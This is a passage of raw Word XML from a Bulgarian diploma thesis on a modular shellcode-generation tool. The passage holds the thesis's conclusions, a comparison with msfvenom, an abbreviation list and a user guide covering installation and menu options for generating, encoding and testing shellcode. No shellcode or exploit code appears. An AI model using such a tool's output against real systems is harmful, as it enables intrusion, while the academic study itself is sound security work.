    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Разработваният инструмент използва друг подход - на всеки шелкод се добавя пълната информация за неговото успешно самостоятелно стартиране, след което той се асемблира. Така всички етикети (label) от сорс кода се запазват. Извличането на байтовете се случва след това. Алтернативно, тези байтове могат се включат в тестова програма, която от своя страна да бъде изпълнена.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="219" w:name="_klxafumzj9ob" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="220" w:name="_Toc3540812"/>
      <w:bookmarkEnd w:id="219"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Обобщение на резултатите</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Шелкодът на msfvenom е резултат от труда на много хора. Той има всевъзможни оптимизации, които са много извън способностите на автора на настоящата работа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Оптималността на шелкода зависи от много фактори, но този, който се генерира, със сигурност не е напълно оптимизиран. Това лесно би могло да се подобри с добавяне на повече и по-добри модули, както и със следваща разработка на инструмента. Модулността придава яснота на генерирания код и води до лесни промени на поведението. Включва се </w:t>
      </w:r>
      <w:r w:rsidRPr="00326004">
        <w:t>метаинформация</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">, която </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">помага за разбирането на реализацията. Удобно е това, че един разработчик може да вземе генерирания асемблерен код и лесно да го оптимизира ръчно, ако се цели употреба в реална обстановка. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00112660">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Fakeheading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="_m6anfmrepnb1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="222" w:name="_Toc3540813"/>
      <w:bookmarkEnd w:id="221"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00112660">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Разработката на шелкод е много труден процес, който изисква обширни познания в компютърните архитектури. Ограничения за стойности и размер изискват много труд за заобикалянето им, а липсата на библиотеки води до повтаряне на този труд. Тестването също е проблем заради множество защити и разнообразни тестови условия като тези на buffer overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00B8642F" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Инструменти като msfvenom автоматизират процеса и са много мощни решения, но имат сложен интерфейс и липсва лесна промяна на поддържаните шелкодове. Разработеният инструмент предлага нов начин за генериране на шелкод, като се опитва да разреши тези проблеми. Двете решения не са конкуренти, а по-скоро допълващи се, в зависимост от целта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Инструментът има завършен вид и предлага силно начало - модулна структура с </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8642F">
        <w:t>воден подход</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> към взимането на параметри от потребителя. Проектиран е за лесно разширяване от нови потребители, при необходимост на нови модули, както и целѝ напълно прозрачен подход за по-лесно разбиране на изходния асемблер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00B5799F" w:rsidRDefault="003A6EB4" w:rsidP="00B5799F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">В следващи разработки може да се обърне внимание на недостатъци като непълна поддръжка на множество архитектури и различни видове оптимизации: стандартен интерфейс за предаване на информация между модули и анализ на съседни модули за елиминиране на излишна работа. Също така, инструментът би </w:t>
      </w:r>
      <w:r w:rsidR="00B5799F">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">могъл да </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">се </w:t>
      </w:r>
      <w:r w:rsidR="00B5799F">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>допълни с</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> множество модули с разнообразни функционалности и оптимизации, подходящи за различни цели.</w:t>
      </w:r>
      <w:bookmarkStart w:id="223" w:name="_1vc5uks0zwm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="223"/>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E60F7" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="Fakeheading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:sectPr w:rsidR="005E60F7" w:rsidRPr="005E60F7" w:rsidSect="00DE5A50">
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:endnotePr>
            <w:numFmt w:val="decimal"/>
          </w:endnotePr>
          <w:pgSz w:w="11909" w:h="16834"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="0" w:footer="0" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="299"/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:id="224" w:name="_43t8rhhz1qyi" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="225" w:name="_Toc3540814"/>
      <w:bookmarkEnd w:id="224"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Библиографи</w:t>
      </w:r>
      <w:r w:rsidR="005E60F7">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Fakeheading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="226" w:name="_fx7dyut77cg" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="227" w:name="_Toc3540815"/>
      <w:bookmarkEnd w:id="226"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Списък на използваните съкращения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>CVE - Common Vulnerabilities and Exposures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>MMU - Memory Management Unit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>ABI - Application Binary Interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>ASLR - Address Space Layout Randomisation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>ROP - Return Oriented Programming</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>PE - Portable Executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>UWP - Universal Windows Platform</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>ELF - Executable and Linkable Format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>RISC - Reduced Instruction Set Computer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>CISC - Complex Instruction Set Computer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>GNU - GNU is Not UNIX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>GCC - GNU Compiler Coll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00326004">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>GNU GPL - GNU General Public License</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Fakeheading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="228" w:name="_Toc3540816"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Приложение 1 - ръководство на потребителя</w:t>
      </w:r>
      <w:bookmarkEnd w:id="228"/>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
        </w:rPr>
        <w:t>Инсталация</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройване на средата:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Необходима среда: python 3.7, elftools, buildutils. За amd64 ubuntu се инсталират така:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sudo apt install binutils python3.7 pip3.7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>библиотеки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00B8642F">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pip3 install elftools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>binutils</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00B8642F">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sudo apt install binutils gcc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="00B8642F" w:rsidP="001009CF">
      <w:pPr>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lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">Стартиране </w:t>
      </w:r>
      <w:r w:rsidR="003A6EB4" w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>на инструмента</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00B8642F" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8642F">
        <w:t>Чрез директно стартиране на изпълнимият файл tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8642F" w:rsidRDefault="00B8642F" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ръчно </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8642F" w:rsidRDefault="003A6EB4" w:rsidP="00B8642F">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidRPr="00112660">
          <w:t>http://github.com/loosper/diploma</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B8642F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8642F" w:rsidRDefault="003A6EB4" w:rsidP="00B8642F">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>cd the_project` `</w:t>
      </w:r>
      <w:r w:rsidR="00B8642F">
        <w:t>pip install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00567E8F" w:rsidRDefault="003A6EB4" w:rsidP="00B8642F">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Стартира се, като се изпълни файла tool.py (`python3.7 tool.py`)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ръководство за употреба</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Принципът на инструмента е, че предлага действия и пита за вход, които зависят от извършеното досега. Всяко действие се обозначава от идентификатор цифра и е подредено по важност. Enter избира стойността по подразбиране. Има 5 основни клона на действие:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Generate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Клон за генериране на шелкод. Първо трябва да се избере архитектура, amd64 по подразбиране, ако вече не е избрана. Следва избор от 5 нови действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“append a module” - добавяне на 1 модул от всички поддържани. Ако модулът се нуждае от параметри, ще се изведе запитване за неговата стойност, обикновено с такава по подразбиране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>”inspect a module” - показва кода на избрания модул</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>”preview current modules” - показва кратко обобщение на всички избрани дотук модули и стойностите на техните параметри</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>”clear selections” - нулира всичко избрано дотук</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">”build assembly” - финализира шелкода и показва генерирания </w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>асемблер</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. След това пита дали да продължи и излиза, ако се избере не (n). Иначе пита за път, където да бъде запазена изходната програма и извлича байтовете на шелкода. Следват нови 7 опции</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“test shellcode” - продължава в клона “test” с готовия шелкод.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“encode shellcode” - продължава в клона “encode” с готовия шелкод.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“debug tools” - продължава в клона “debug”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“build again” - връща се в началото на generate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“look at disassembly” - показва деасемблирания шелкод и се връща в началото</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“save and exit”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00567E8F" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
